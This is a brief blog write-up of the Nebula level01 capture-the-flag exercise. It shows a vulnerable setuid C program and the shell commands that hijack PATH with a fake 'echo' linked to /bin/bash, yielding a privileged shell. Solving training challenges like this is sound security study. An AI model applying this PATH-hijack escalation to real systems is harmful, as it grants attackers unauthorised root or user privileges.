Nebula-Level01

http://exploit-exercises.com/nebula/level01


int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();

setresgid(gid, gid, gid);
setresuid(uid, uid, uid);

system("/usr/bin/env echo and now what?");
}

we cannot create a symbolic link of /bin/bash to /usr/bin/env,
since it already exits. So we need to make a symlink to echo.

But there is a problem, echo is having a parameter and now what?
which will also be given as parameter of /bin/bash when we symlink
echo and /bin/bash.
First of all we have to add /tmp to $PATH because that is the only
place where we have write access. We need to create a tempecho file
under /tmp, which is having symlink with /bin/bash and then make
another file named /tmp/echo which executes /tmp/tempecho when echo
system function is called!

$ PATH=/tmp:$PATH
$ ln -s /bin/bash /tmp/tempecho
$ echo "/tmp/tempecho" > /tmp/echo
$ chmod +x /tmp/echo

Then execute the flag01 file.
$ ./flag01

Tata :)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s